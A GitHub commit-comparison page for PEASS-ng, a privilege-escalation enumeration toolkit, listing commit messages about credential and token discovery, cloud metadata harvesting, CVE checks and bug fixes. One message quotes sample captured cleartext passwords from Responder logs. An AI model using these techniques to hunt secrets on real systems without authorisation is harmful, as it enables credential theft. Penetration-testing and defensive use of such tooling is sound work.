Compare commits

...

282 Commits

Author SHA1 Message Date
SirBroccoli
41128808a6
Merge pull request #483 from securitytime/patch-1
Update Beaprint.cs
2025-07-01 16:23:13 +02:00
carlospolop
6fd96f4bdb f 2025-07-01 12:12:01 +02:00
carlospolop
a745f00dd7 fix 2025-07-01 11:10:21 +02:00
securitytime
933e12d7f1
Update Beaprint.cs
A space character is missing here:
"... educational purposes only.Any misuse of this software  ..."
2025-06-28 09:12:40 +02:00
SirBroccoli
4061cef7e8
Merge pull request #476 from peass-ng/codex/fix-url-reference-in-linpeasbuilder.py
Fix url variable reference in linpeasBuilder
2025-06-25 01:59:43 +02:00
SirBroccoli
b66ced3c63
Merge pull request #475 from peass-ng/codex/find-and-fix-a-bug
Fix parser global state reuse
2025-06-25 01:59:03 +02:00
SirBroccoli
cde725dacc
Merge pull request #477 from peass-ng/codex/update-docstring-and-fix-typo
Fix docstring and comment in linpeasBuilder
2025-06-25 01:57:58 +02:00
SirBroccoli
f0f829890c
Merge pull request #479 from peass-ng/codex/replace--parth--with--path--in-argparse
Fix typo in linpeas builder arg help
2025-06-25 01:57:11 +02:00
SirBroccoli
99c36b8562
Merge pull request #480 from Signum21/master
Fixed multiple bugs in Vulnerable Leaked Handlers
2025-06-25 01:56:58 +02:00
SirBroccoli
a74c6c820f
Merge pull request #482 from Aarav-Juneja/builder-exclude-fix
Fix exclude modules on linPEASS
2025-06-25 01:55:48 +02:00
SirBroccoli
53fd4d8dc8
Merge pull request #481 from ertaku12/master
Added a privilege escalation vulnerability for MySQL 4.x/5.x versions.
2025-06-25 01:55:25 +02:00
Aarav Juneja
9b37fd4ef4 Fix exclude modules on linPEASS 2025-06-24 13:05:10 -07:00
John Doe
f27b1d4816 Added a privilege escalation vulnerability for MySQL 4.x/5.x versions. 2025-06-23 22:37:44 +03:00
Signum21
d335b9254f Fixed multiple bugs in Vulnerable Leaked Handlers 2025-06-15 20:59:20 +02:00
SirBroccoli
d5e3c2a885 Fix typo in linpeas builder output argument 2025-06-06 00:38:05 +02:00
SirBroccoli
4af321d138 Fix docstring and comment typo 2025-06-06 00:01:29 +02:00
SirBroccoli
4e556fd594 Fix variable reference when parsing URLs 2025-06-06 00:01:17 +02:00
SirBroccoli
39066f6867 Fix leftover debug code and reset state in parser 2025-06-06 00:00:39 +02:00
SirBroccoli
c3a93a57fe
Merge pull request #473 from Signum21/master
Fix IdentityNotMappedException in Vulnerable Leaked Handlers
2025-05-31 22:36:49 +02:00
Signum21
f62d9fc550 Fix System.Security.Principal.IdentityNotMappedException in Vulnerable Leaked Handlers 2025-05-31 04:56:14 +02:00
SirBroccoli
11e9b8dde6
Merge pull request #472 from Jack-Vaughn/NoEnvVars-Update
Add 4 noisy environment variables to NoEnvVars.sh
2025-05-26 23:57:40 +02:00
Jack Vaughn
b9a9ad5ddf
Add 4 noisy and useless environment variables to NoEnvVars.sh
These variables (^PATH=|^INVOCATION_ID=|^WATCHDOG_PID=|^LISTEN_PID=) frequently appear across processes 
on busy systems (10+ each on tested system) and produce a large volume of irrelevant output
2025-05-25 21:32:51 -04:00
carlospolop
88f08a405e l 2025-05-26 02:55:07 +02:00
SirBroccoli
322792c4ec
Merge pull request #471 from Jack-Vaughn/environ-check
Add module to check for sensitive environment variables via /proc/*/environ
2025-05-26 02:33:43 +02:00
Jack
c150e63b52 This module scans /proc/*/environ for potentially sensitive environment variables on Linux systems.
It targets common keywords like token, password, secret, AWS, API, etc.

Uses 'tr' instead of 'strings' to improve compatibility in minimal environments like containers.

The check is skipped entirely on MacPEAS.
2025-05-25 12:55:34 -04:00
carlospolop
7b8dcfbe8d f 2025-05-25 08:17:07 +02:00
carlospolop
aac3667247 f l 2025-05-25 08:15:48 +02:00
carlospolop
64ab193d25 f linpeas 2025-05-25 07:05:48 +02:00
carlospolop
aab8241ede f 2025-05-25 02:21:39 +02:00
carlospolop
65b98d11ac only print errors when relevant 2025-05-25 02:10:07 +02:00
carlospolop
1e72dbeb76 impr winpeas networking checks 2025-05-25 01:46:30 +02:00
carlospolop
c9282b4bdb fix winpeas? 2025-05-25 01:37:03 +02:00
carlospolop
b91334e5b3 fix 2025-05-24 23:37:00 +02:00
carlospolop
b7bc20a027 improvement 2025-05-24 23:31:12 +02:00
carlospolop
4fbe6ffd79 winpeas networkinfo test ci/cd 2025-05-24 23:16:31 +02:00
carlospolop
c288f3a810 fw 2025-05-24 23:05:13 +02:00
carlospolop
f3e29a509f fix winpeas 2025-05-24 23:02:18 +02:00
carlospolop
c29fc553b5 Merge branch 'master' of github.com:peass-ng/PEASS-ng 2025-05-24 08:30:12 +02:00
carlospolop
1e7a90d29f cursor rewrite + network checks 2025-05-24 08:29:47 +02:00
SirBroccoli
5a5d44f393
Merge pull request #470 from Signum21/master
WinPeas: Differentiate between Allow ACLs and Deny ACLs
2025-05-21 07:06:46 +02:00
Signum21
368f0af794
WinPeas: Differentiate between Allow ACLs and Deny ACLs
Works for files, folders, registry keys and named pipes
2025-05-21 03:33:33 +02:00
carlospolop
604580adbd more 2025-05-19 06:36:39 +02:00
carlospolop
9820c18697 Cursor improvements parts 1 and 2 2025-05-19 06:36:35 +02:00
carlospolop
ea9b930fdb fix capabilities module 2025-05-18 14:33:02 +02:00
SirBroccoli
dae0f7a533
Merge pull request #468 from ThatTotallyRealMyth/ThatTotallyRealMyth-4_capEdit-1
Update 4_Capabilities.sh: Fix capability decoding to prevent shell breaking output from shell/process capability checking.
2025-05-18 14:19:28 +02:00
carlospolop
3a317cc5c4 fix ec2 2025-05-18 14:17:15 +02:00
ThatTotallyRealMyth
01bf3a4ef8
Update 4_Capabilities.sh: Fix capability decoding to prevent sequence number output
Testing confirmed that certain capability values (specifically ffffffffffffffff) cause memory allocation errors in capsh:
"xrealloc: cannot allocate 716488832 bytes (57344 bytes allocated)"

These memory errors were being propagated into the output, causing the long sequence of numbers. The fix prevents these errors from affecting the script's output.
2025-05-18 16:05:01 +10:00
carlospolop
ef28ef7a33 fix linpeas not getting EC2 metadata 2025-05-18 04:58:22 +02:00
carlospolop
58c107df40 fix kill? 2025-05-18 04:46:19 +02:00
carlospolop
63c090059b kill frozen external binaries 2025-05-18 01:20:32 +02:00
carlospolop
4c16f72ae2 fix 2025-05-17 16:09:36 +02:00
carlospolop
85684b39ad add timeout 120 when executing external binary 2025-05-17 16:06:35 +02:00
SirBroccoli
c0b171a5c1
Update peass.rb 2025-05-16 22:25:10 +02:00
SirBroccoli
ddc2d95cb4
Update peass.rb 2025-05-16 15:53:43 +02:00
Carlos Polop
97ae1d2e3b Merge branch 'master' of github.com:peass-ng/PEASS-ng 2025-04-24 04:20:22 +02:00
Carlos Polop
3b6f0a5bdc f 2025-04-24 04:20:19 +02:00
SirBroccoli
7008652029
Merge pull request #462 from jahway603/jahway603-patch-1
Minor URL fix
2025-03-30 19:18:52 +02:00
SirBroccoli
e5239f8c58
Merge pull request #461 from Signum21/master
Handle path access denied
2025-03-30 19:18:34 +02:00
SirBroccoli
b2c03246d2
Merge pull request #459 from gildasio/master
Set grep to show filename that contains passwords
2025-03-30 19:18:13 +02:00
SirBroccoli
f0686d491b
Merge pull request #464 from spkal01/master
Rework PEASS url logic for the metasploit module
2025-03-29 21:56:35 +01:00
spkal01
99e8eb7813 Rework PEASS url logic for the metasploit module 2025-03-29 21:45:58 +02:00
Carlos Polop
46193aa0d5 fix 2025-03-20 05:13:54 +01:00
Carlos Polop
62022abc47 impr winpeas 2025-03-20 05:02:34 +01:00
jahway603
d63e737b63 Minor URL fix 2025-03-18 12:33:50 -04:00
Signum21
0b041ad694
Handle path access denied
The program crashes when trying to access a path that is not allowed.
An example of this can be found on the latest HackTheBox machine (TheFrizz) where the starting user can't access the path C:\Users
2025-03-16 05:43:48 +01:00
Gildasio Junior
8ea67f3cc2
Set grep to show filename that contains passwords
This way one can identify which file contains the relevant information,
eg:

/var/log/responder/Poisoners-Session.log:2025-02-09 21:12:12,701 - [*] Skipping previously captured cleartext password for donald
/var/log/responder/Responder-Session.log:11/02/2025 12:33:11 PM - [HTTP] Basic Password : bambam
/var/log/responder/Responder-Session.log:11/02/2025 12:36:12 PM - [HTTP] Basic Password : estrella
2025-02-28 19:54:44 -03:00
Carlos Polop
ce5cb1ad9c fix 2025-02-24 00:21:09 +01:00
Carlos Polop
30586c064f Merge branch 'master' of github.com:peass-ng/PEASS-ng 2025-02-23 23:58:45 +01:00
Carlos Polop
b82fc9ac39 improve winpeas azure env detection 2025-02-23 23:58:41 +01:00
SirBroccoli
54818756e4
Update README.md 2025-02-23 23:47:47 +01:00
Carlos Polop
516aafff27 fix wget 2025-02-16 17:36:01 +01:00
Carlos Polop
2b64ffc803 a 2025-02-16 16:15:19 +01:00
Carlos Polop
9f8563c751 improve linpeas 2025-02-15 18:14:56 +01:00
Carlos Polop
573acee58c improve azure linpeas 2025-02-15 17:43:42 +01:00
SirBroccoli
41e00d5618
Merge pull request #458 from DidierA/macos_echo
Fix echo -n on macOS
2025-02-02 13:49:16 +01:00
SirBroccoli
536913e7f0
Merge pull request #457 from gcorrall/fix_28_files_with_passwords
Fix 28_Files_with_passwords.sh
2025-02-02 13:48:14 +01:00
DidierA
4d771fb1f6
Fix echo -n on macOS 2025-01-31 16:45:24 +01:00
Gary Corrall
4964033d44 Fix 28_Files_with_passwords.sh 2025-01-29 16:33:54 +00:00
Carlos Polop
092af1413d update azure files with tokens 2025-01-26 15:58:48 +01:00
Carlos Polop
7cd9e6f78b az tokens 2025-01-25 00:40:15 +01:00
Carlos Polop
21a5ef9325 add az tokens 2025-01-24 19:27:57 +01:00
SirBroccoli
c3744a730b
Merge pull request #453 from KatsuragiCSL/patch-1
swap ppid and pid user in "PPID belongs to a different user (not root)" test
2025-01-13 12:16:51 +01:00
KatsuragiCSL
7abe31c107
swap ppid and pid user in "PPID belongs to a different user (not root)" test
Seems like it is reporting processes with ppid user root instead of not root. e.g. I see it reports "proc xyz with ppid 1 is run by user messagebus but the ppid user is root" when run in a linux box
2025-01-13 18:17:51 +08:00
Carlos Polop
3e8078f1cb fix response var 2025-01-12 13:23:01 +01:00
Carlos Polop
abd1f3d4b5 improved support az metadata 2025-01-11 19:51:14 +01:00
Carlos Polop
7e749c50ac fix 2025-01-10 09:33:20 +01:00
Carlos Polop
2e74ef4a2c fix id check_az_automation_acc 2025-01-10 09:23:20 +01:00
Carlos Polop
bc9a368626 az automation account 2025-01-10 09:21:52 +01:00
SirBroccoli
818dea92f3
Merge pull request #452 from JaimePolop/master
Brief description of your changes
2025-01-06 19:30:32 +01:00
Jimmy
96b7bdaf91 Brief description of your changes 2025-01-06 13:55:15 +01:00
SirBroccoli
82088b597c
Merge pull request #449 from Average-Bear/master
WinPEAS.ps1 changes only -- Minor fixes, Removed Get-CimInstance Win32_product for ("Known Bad"), Remove PSCustomObject for cmdlet PSObject
2025-01-06 11:08:06 +01:00
Carlos Polop
aa5f5c0e2f tested 2024-12-22 01:28:12 +01:00
Carlos Polop
d576055342 update azure apps 2024-12-21 17:49:41 +01:00
Carlos Polop
a3e3e9799b fix azure apps 2024-12-21 15:12:59 +01:00
Carlos Polop
2a71da4bb2 another linpeas fix 2024-12-05 17:49:44 +01:00
Carlos Polop
1e1a8a7c86 fix linpeas 2024-12-05 12:00:27 +01:00
Carlos Polop
186e659080 fix builder 2024-12-05 01:24:35 +01:00
Carlos Polop
3559a62d51 add more azure metadata info 2024-12-04 00:28:25 +01:00
Carlos Polop
ae49e7fa02 fix tencent 2024-12-03 19:51:16 +01:00
Carlos Polop
18f5b5ef96 f 2024-12-03 19:49:48 +01:00
SirBroccoli
4279b08991
Update README.md 2024-12-03 13:05:17 +01:00
SirBroccoli
32e3a4b776
Merge pull request #447 from darses/master
Add Windows LAPS check
2024-11-29 01:48:20 +01:00
darses
a150d4a022 Add Windows LAPS check to winPEAS.bat 2024-11-28 19:37:58 +01:00
Carlos Polop
cdb81d7eb4 up 2024-11-28 11:44:32 +01:00
Jeremy DeWitt
90442f8e0c
Minor Fixes 2024-10-29 13:39:16 -05:00
Carlos Polop
6a98d46987 Merge branch 'master' of github.com:peass-ng/PEASS-ng 2024-10-11 02:44:54 +01:00
Carlos Polop
f55d20a67d fix google password sync 2024-10-11 02:44:43 +01:00
SirBroccoli
85ab89511e
Update sensitive_files.yaml 2024-10-11 02:56:41 +02:00
SirBroccoli
623fdd24d7
Merge pull request #444 from 0x48756773/master
Fixed Select-Objet - winPEAS.ps1
2024-10-11 01:54:10 +01:00
Carlos Polop
26cb96cdc7 Merge branch 'master' of github.com:peass-ng/PEASS-ng 2024-10-11 01:52:17 +01:00
Carlos Polop
abd4aa59cd Google Password Sync 2024-10-11 01:51:45 +01:00
0x48756773
54fcb8a98b
Update winPEAS.ps1 2024-10-09 09:23:46 -05:00
Carlos Polop
ac29863d3b fix vars 2024-10-07 15:13:08 +02:00
Carlos Polop
c62c844683 fix name 2024-10-07 15:11:45 +02:00
Carlos Polop
d23be35a28 fix name 2024-10-07 15:10:55 +02:00
Carlos Polop
4b04fd143b fix name 2024-10-07 15:09:56 +02:00
Carlos Polop
08746a3dff CVE-2021-3560 2024-10-07 15:08:07 +02:00
Carlos Polop
eebe7974a9 gcds 2024-10-07 13:35:40 +01:00
Carlos Polop
4bd1dbdf45 msg 2024-10-03 14:58:04 +01:00
Carlos Polop
003b389c41 Merge branch 'master' of github.com:peass-ng/PEASS-ng 2024-10-02 15:15:34 +01:00
Carlos Polop
8dfa0ef054 token handle 2024-10-02 15:15:21 +01:00
SirBroccoli
a5ce3f938d
Merge pull request #443 from RandolphConley/master
Updated code to use Foreach loop to get all local groups, then examine each group's members
2024-10-02 12:33:05 +01:00
Carlos Polop
9340bdca19 localconfiggcpw 2024-10-02 12:21:31 +01:00
RandolphConley
c4b52cadb7 Merge branch 'master' of https://github.com/RandolphConley/PEASS-ng 2024-10-02 07:16:13 -04:00
RandolphConley
1884a64e37 Foreach loop to get all local groups, then examine each group's members
Code has been modified to accommodate for any language by filtering only on the output and not looking for a string of text
2024-10-02 07:14:18 -04:00
Carlos Polop
19b2a94c2d Merge branch 'master' of github.com:peass-ng/PEASS-ng 2024-10-01 17:31:35 +01:00
Carlos Polop
82fcd44b56 fix 2024-10-01 17:31:25 +01:00
SirBroccoli
8a3e272e21
Merge pull request #441 from peass-ng/dependabot/nuget/winPEAS/winPEASexe/winPEAS/System.Net.Http-4.3.4
Bump System.Net.Http from 4.3.0 to 4.3.4 in /winPEAS/winPEASexe/winPEAS
2024-10-01 15:34:22 +01:00
dependabot[bot]
8032abdbfc
Bump System.Net.Http from 4.3.0 to 4.3.4 in /winPEAS/winPEASexe/winPEAS
Bumps System.Net.Http from 4.3.0 to 4.3.4.

---
updated-dependencies:
- dependency-name: System.Net.Http
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
2024-10-01 13:30:11 +00:00
SirBroccoli
ea4958c483
Merge pull request #442 from RandolphConley/master
Issue fixed for "group name" missing from any language
2024-10-01 14:29:14 +01:00
SirBroccoli
7144ea2dc6
Merge pull request #440 from peass-ng/dependabot/nuget/winPEAS/winPEASexe/winPEAS/System.Text.RegularExpressions-4.3.1
Bump System.Text.RegularExpressions from 4.3.0 to 4.3.1 in /winPEAS/winPEASexe/winPEAS
2024-10-01 14:28:49 +01:00
RandolphConley
95a508171f
Merge branch 'peass-ng:master' into master 2024-10-01 09:20:52 -04:00
RandolphConley
ac6b5a9add Updated code to strip first column and add "group name" header
Line 70 comment: This should now work for any language. Command runs whoami group, removes the first two lines of output, converts from csv to object, but adds "group name" to the first column.
2024-10-01 09:18:48 -04:00
SirBroccoli
6854d3ae30
Update CI-master_tests.yml 2024-10-01 13:16:13 +02:00
SirBroccoli
6fa12e07f1
Update CI-master_tests.yml 2024-10-01 11:57:11 +02:00
SirBroccoli
e6e1145be6
Update CI-master_tests.yml 2024-10-01 11:29:39 +02:00
SirBroccoli
d37ebda1b5
Update CI-master_tests.yml 2024-10-01 05:27:30 +02:00
SirBroccoli
c5775dda59
Update CI-master_tests.yml 2024-10-01 05:20:42 +02:00
SirBroccoli
bc732d6458
Update CI-master_tests.yml 2024-10-01 05:13:26 +02:00
dependabot[bot]
8969184998
Bump System.Text.RegularExpressions in /winPEAS/winPEASexe/winPEAS
Bumps System.Text.RegularExpressions from 4.3.0 to 4.3.1.

---
updated-dependencies:
- dependency-name: System.Text.RegularExpressions
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
2024-10-01 03:10:53 +00:00
Carlos Polop
79c79e3426 Merge branch 'master' of github.com:peass-ng/PEASS-ng 2024-10-01 04:09:17 +01:00
Carlos Polop
b8adc7af3b gcpw.test 2024-10-01 04:06:15 +01:00
SirBroccoli
edab7cecba
Remove launch tests 2024-10-01 04:52:06 +02:00
Carlos Polop
f80c1f371e gcpw 2024-10-01 03:41:07 +01:00
Carlos Polop
f90cdf9a87 find gcpw info 2024-10-01 02:36:12 +01:00
Carlos Polop
7a9ea40cbb Less false positives applied to small names 2024-09-24 11:49:57 +02:00
Carlos Polop
faf6be53a8 added new suids cves 2024-09-23 15:00:23 +02:00
Carlos Polop
83f18f891f add CVE-2021-4034 2024-09-23 14:57:12 +02:00
SirBroccoli
b6ec3236d8
Change to once a month releases 2024-09-23 14:44:11 +02:00
SirBroccoli
2ab6e7047e
Merge pull request #439 from peass-ng/carlospolop-patch-3
Update CONTRIBUTING.md
2024-09-23 14:41:54 +02:00
SirBroccoli
bf1edc9a18
Update CONTRIBUTING.md 2024-09-23 14:41:43 +02:00
SirBroccoli
8d096a4c72
Merge pull request #438 from tunnellord/master
User folder for cloud creds
2024-09-23 14:41:05 +02:00
Carlos Polop
d9f6e3eb46 fix issue 435 2024-09-23 14:36:50 +02:00
tunnellord
abfb06e77c
User folder for cloud creds 2024-09-22 14:35:21 +02:00
Carlos Polop
cb39091bfa curl follow redirects 2024-09-19 11:57:19 +02:00
SirBroccoli
7979c470a1
Update CI-master_tests.yml 2024-09-05 14:02:04 +02:00
SirBroccoli
746ef49fc8
Merge pull request #432 from B-Kluss/patch-1
Fix: README.md Linpeas
2024-09-05 13:15:25 +02:00
B-Kluss
5fa7823e38
Fix: README.md Linpeas
Exchange broken release page url
2024-09-05 10:29:53 +02:00
SirBroccoli
2e615f7bc6
Merge pull request #431 from peass-ng/dependabot/github_actions/dot-github/workflows/actions/download-artifact-4.1.7
Bump actions/download-artifact from 2 to 4.1.7 in /.github/workflows
2024-09-04 12:26:42 +02:00
SirBroccoli
5ecb01ed14
Merge pull request #430 from jeffbencteux/add-useful-software
Update USEFUL_SOFTWARE.sh
2024-09-04 12:26:21 +02:00
dependabot[bot]
ac8a3fac97
Bump actions/download-artifact from 2 to 4.1.7 in /.github/workflows
Bumps [actions/download-artifact](https://github.com/actions/download-artifact) from 2 to 4.1.7.
- [Release notes](https://github.com/actions/download-artifact/releases)
- [Commits](https://github.com/actions/download-artifact/compare/v2...v4.1.7)

---
updated-dependencies:
- dependency-name: actions/download-artifact
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
2024-09-03 22:02:59 +00:00
Jeffrey Bencteux
f881a4719d
Update USEFUL_SOFTWARE.sh
add lua and go binaries as they serve to escape restricted environments.
2024-09-03 15:14:35 +02:00
Carlos Polop
b3bcfa4466 f2 2024-08-28 21:57:32 +02:00
Carlos Polop
adc8e168a5 f 2024-08-28 21:11:54 +02:00
Carlos Polop
1a82bd8ee4 all arg 2024-08-28 20:03:32 +02:00
Carlos Polop
9408efbcd7 fix 2024-08-28 20:01:03 +02:00
Carlos Polop
bf00500bd1 fileanalysis winpeas not default 2024-08-28 19:52:24 +02:00
Carlos Polop
b3cd9417f8 fic 2024-08-28 00:06:09 +02:00
Carlos Polop
a3fe115848 update workflows 2024-08-28 00:02:29 +02:00
Carlos Polop
49efee3bb9 merge 2024-08-27 23:58:45 +02:00
Carlos Polop
0ed01d58d3 Big linpeas update 2024-08-27 23:56:21 +02:00
SirBroccoli
55326d29cc
Merge pull request #424 from 0danteh/patch-1
Refactor peasLoaded.py for Improved Efficiency
2024-08-27 22:59:24 +02:00
SirBroccoli
bffde719fa
Merge pull request #426 from inPhraZ/linpeas-container
linPEAS: Add CVE-2021-41091 to docker version exploits
2024-08-27 22:56:21 +02:00
SirBroccoli
f296f659b6
Merge pull request #429 from shadowabi/master
Update 3_cloud.sh for check_cvm
2024-08-27 22:54:36 +02:00
Carlos Polop
463154aa05 Merge branch 'master' of github.com:peass-ng/PEASS-ng 2024-08-27 22:10:06 +02:00
Carlos Polop
b435119723 WinPEASS Big Update 2024-08-27 22:08:48 +02:00
shadowabi
8afc352878
Update 3_cloud.sh
add detect user data
2024-06-17 14:31:28 +08:00
shadowabi
efa0e98547
Update 3_cloud.sh for check_cvm
Added connection timeout Settings and fixed wget syntax errors for check_cvm
2024-06-17 11:23:11 +08:00
Farzin Monsef
5c1f081344 checkDockerVersionExploits: add CVE-2021-41091 2024-06-02 17:43:33 +03:30
cp
74c1391d66
Merge pull request #421 from gcorrall/fix_find_possible_conf_files
Fix 'find possible conf files with passwords' in 9_interesting_files.sh
2024-05-05 15:54:30 +02:00
Dante
fa5578b2ff
Refactor peasLoaded.py for Improved Efficiency
This pull request introduces a set of improvements to the peasLoaded.py file, aimed at enhancing the readability, maintainability, and performance of the code. The key changes include:

- Indentation Correction: Fixed the indentation to comply with Python standards, ensuring proper code block recognition and avoiding potential runtime errors.

- List Comprehension: Implemented list comprehension for the creation of FileRecord instances, which simplifies the code structure and improves readability.

- Configuration Handling: Streamlined the access to the config dictionary by extracting it once at the beginning of the loop, reducing repetitive code and potential access errors.

- Default Value Usage: Utilized the .get() method with default values from DEFAULTS for both `auto_check` and `exec` keys.

These changes do not alter the core functionality of the code but provide a cleaner and more efficient approach to the existing logic.

Please review the changes and let me know if there are any concerns or further improvements that can be made.
2024-05-05 14:50:25 +02:00
cp
972503f806
Update CI-master_tests.yml 2024-05-05 11:48:54 +02:00
Gary Corrall
d8f86e81b2 Fix 'find possible conf files with passwords' in 9_interesting_files.sh 2024-04-11 14:54:27 +01:00
cp
a2fb2cd2be
Update 3_cloud.sh 2024-04-08 11:31:00 +02:00
cp
5621c83110
Merge pull request #420 from shadowabi/master
Delete the condition that Tencent Cloud detection is liable to cause false positives
2024-04-08 11:30:14 +02:00
shadowabi
751d61b27f
Update 3_cloud.sh
Delete the condition that Tencent Cloud detection is liable to cause false positives
2024-04-08 14:41:46 +08:00
Carlos Polop
c37db4654c peass-ng 2024-04-04 11:30:56 +02:00
cp
e879812f45
Merge pull request #419 from MikeLauer/patch-1
Fix copy-paste mistake in Firefox.cs
2024-04-04 11:15:49 +02:00
Mike
db41676cdf
Fix copy-paste mistake in Firefox.cs 2024-04-01 15:35:56 +02:00
HackTricks
e32f496f12
Update FileAnalysis.cs 2024-03-23 13:02:56 +01:00
Carlos Polop
aee8acf60f
Update 3_cloud.sh 2024-02-26 20:40:36 +01:00
Carlos Polop
a79fb7f5d5
Update 3_cloud.sh 2024-02-25 20:50:25 +01:00
Carlos Polop
0dccf2f2a8
Merge pull request #415 from LionelOvaert/patch-1
Add try-except for PrintCachedCreds
2024-02-23 15:12:38 +01:00
Carlos Polop
0cc314fe04
Merge pull request #413 from md347/master
Update FileAnalysis.cs
2024-02-23 15:10:27 +01:00
Carlos Polop
186ae60e9e fix 2024-02-21 16:39:57 +01:00
Carlos Polop
c4e858d226 cloud functions 2024-02-21 16:39:46 +01:00
Carlos Polop
8468c666f9
Merge pull request #408 from shadowabi/master
support of Tencent Cloud Enumeration
2024-02-21 16:15:22 +01:00
Lionel Ovaert
b430fc80bd
Add try-except for PrintCachedCreds 2024-02-18 21:09:53 +01:00
shadowabi
2f687dde18
Update 3_cloud.sh
Fixed an error and added an auxiliary judgment
2024-02-16 00:46:58 +08:00
md347
41d6a03db3
Update FileAnalysis.cs
escape backslashes in regex
2024-02-13 21:54:08 +00:00
Carlos Polop
b4b8afa169
Merge pull request #411 from wowlolx/master
Fixed netsh command for spaces in SSIDs
2024-01-31 11:37:19 +01:00
wowlolx
8c7f56631f
Fixed netsh command for spaces in SSIDs 2024-01-31 00:34:27 +05:00
shadowabi
2d68186677
Format alignment 2024-01-25 11:58:51 +08:00
shadowabi
177fe211d0
Update 3_cloud.sh 2024-01-25 11:55:34 +08:00
shadowabi
9960d4780f
Add files via upload 2024-01-25 11:52:11 +08:00
shadowabi
4260e06722
add Tencent CVM metadata search 2024-01-25 11:49:20 +08:00
Carlos Polop
398081451f
Merge pull request #407 from Esonhugh/master
linpeas Cloud.sh: support of Alibaba Cloud Enumeration
2024-01-24 18:13:22 +01:00
Carlos Polop
2dfbe62e64
Merge pull request #406 from mcdruid/master
fix typo in 'run unshare' container check
2024-01-24 18:12:53 +01:00
Carlos Polop
12ff600e52
Merge pull request #403 from Signum21/master
Better error handling in FileAnalysis
2024-01-24 18:11:02 +01:00
Esonhugh
edd8e3a397
feat: instance name and type 2024-01-22 22:04:21 +08:00
Esonhugh
7daefe700f
update: bug of req var error 2024-01-22 21:49:22 +08:00
Esonhugh
0c5b8194d3
format: better format of aliyun network print 2024-01-22 21:46:12 +08:00
Esonhugh
74ccf2c08a
fix: missing do at the of for 2024-01-22 21:39:41 +08:00
Esonhugh
9865e2a5b0
feat: aliyun network enumeration 2024-01-22 21:32:48 +08:00
Esonhugh
a8b7084b3e
feat: aliyun cloud support [incomplete] 2024-01-22 21:07:32 +08:00
mcdruid
5c4f81d0d4 fix typo in 'run unshare' container check 2024-01-16 16:11:42 +00:00
Carlos Polop
46612a23aa
Merge pull request #405 from d4t4s3c/patch-1
useful for when on the victim host we have access to the internet but…
2024-01-13 16:36:49 +01:00
Carlos Polop
a762fdd29e
Merge pull request #404 from AidanFeess/master
Create powershell versions of the peas2json.py and json2html.py parsers
2024-01-13 16:36:26 +01:00
Carlos Polop
048428236c
Merge pull request #400 from lenhart/master
Fix Typo in SNMP Check
2024-01-13 16:35:29 +01:00
d4t4s3c
28a8f4b3e9
useful for when on the victim host we have access to the internet but we do not have: curl, wget or netcat 2024-01-13 13:40:24 +01:00
Aidan Feess
ad357d538a
remove irrelevant error message text 2023-12-14 14:46:00 -06:00
Aidan Feess
61a4f91baa
remove irrelevant error message text 2023-12-14 14:45:01 -06:00
Aidan Feess
c131c20a43
fix typo 2023-12-14 14:41:14 -06:00
Aidan Feess
f5339ae80c
add json to html powershell parser 2023-12-14 12:35:20 -08:00
Aidan Feess
ed4d60c64d
Add winpeas to json powershell parser 2023-12-14 12:34:32 -08:00
Signum21
340256b3b3
Better error handling in FileAnalysis
The previous specific check doesn't handle the following exception, causing it to be caught by the last try/catch block.

Error looking for regexes inside files: System.AggregateException: One or more errors occurred. ---> System.UnauthorizedAccessException: Access to the path '<REDACTED>' is denied.
2023-11-28 00:38:13 +01:00
lenhart
6da7bfb7f6
Fix Typo in SNMP Check 2023-11-15 11:51:33 +01:00
Carlos Polop
31aed5cd92
Merge pull request #397 from RandolphConley/master
code update ; Added search / function for excel files
2023-10-24 12:34:02 +02:00
StevenLtheThird
11d93c42e7 Update winPEAS.ps1
Remove extra code in search for files.
2023-10-13 17:46:43 -04:00
StevenLtheThird
9f75cc824c Merge branch 'master' of https://github.com/RandolphConley/PEASS-ng 2023-10-13 17:43:05 -04:00
StevenLtheThird
8caca65606 Update winPEAS.ps1 2023-10-13 17:42:51 -04:00
RandolphConley
3ee6ee0836
Merge branch 'carlospolop:master' into master 2023-10-13 17:39:54 -04:00
StevenLtheThird
e0b0ffcacc code update ; Added search / function for excel files
Function will read excel files looking for words: "user" or "pass" - in case those cells are populated for a credentials file.
2023-10-13 17:39:24 -04:00
Carlos Polop
9163062daa
Merge pull request #396 from RandolphConley/master
logo color, updated output, added -fullcheck flag
2023-10-11 22:59:21 +02:00
StevenLtheThird
6d8db70b30 Merge branch 'master' of https://github.com/RandolphConley/PEASS-ng 2023-10-11 15:58:02 -04:00
StevenLtheThird
4ee91b897a logo color, updated output, added -fullcheck flag
Added colors to the logo, so winPEAS looks like it should.
Updated the output to filter out erroneous information. Which leads to the -fullcheck flag.
The flag adds all regex searches back into the script to check files/folders for data. However the regexes do return false positives, so use as a last resort.
2023-10-11 15:57:35 -04:00
Carlos Polop
05f6cb7b0a
Update 9_interesting_files.sh 2023-10-02 23:54:28 +02:00
Carlos Polop
5199c4c395
Update ProcessInfo.cs 2023-08-24 19:48:31 +02:00
Carlos Polop
f99387feed
Update linpeas_base.sh 2023-08-18 13:19:53 +02:00
Carlos Polop
7eac86c008
Merge pull request #387 from RandolphConley/master
Updated switch parameter to TimeStamp
2023-08-17 22:00:57 +02:00
StevenLtheThird
cab71afe3a update Parameter $TimeStamp 2023-08-17 15:18:59 -04:00
StevenLtheThird
822768ca1b Add $debugTimeStamp parameter 2023-08-17 14:40:49 -04:00
Carlos Polop
84dc284fac
Merge pull request #382 from RandolphConley/master
Feature add, bug fix
2023-08-08 07:41:42 +02:00
StevenLtheThird
101f477279 Merge branch 'master' of https://github.com/RandolphConley/PEASS-ng 2023-08-07 15:20:07 -04:00
StevenLtheThird
f296c89300 Feature Add, Bug fix
Added 203 regex password options (from yaml regex search).
Updated entry for %userprofile% to $env:UserName
2023-08-07 15:20:01 -04:00
Carlos Polop
eddc6726e0
Update 1_system_information.sh 2023-08-07 08:35:15 +02:00
Carlos Polop
ae37d8f24f
Merge pull request #380 from makikvues/fix-tests-and-logo
Fixed logo, removed long-running checks from tests, create search lists only if necessary
2023-08-05 18:02:31 +02:00
makikvues
78d187db52 - fixed logo
- updated tests, long-running checks are removed
- create search lists only if necessary
2023-08-03 19:21:22 +02:00
Carlos Polop
0fe26134ea
Merge pull request #378 from Mateodevv/master
Fixed Typo in Readme for linPEASS
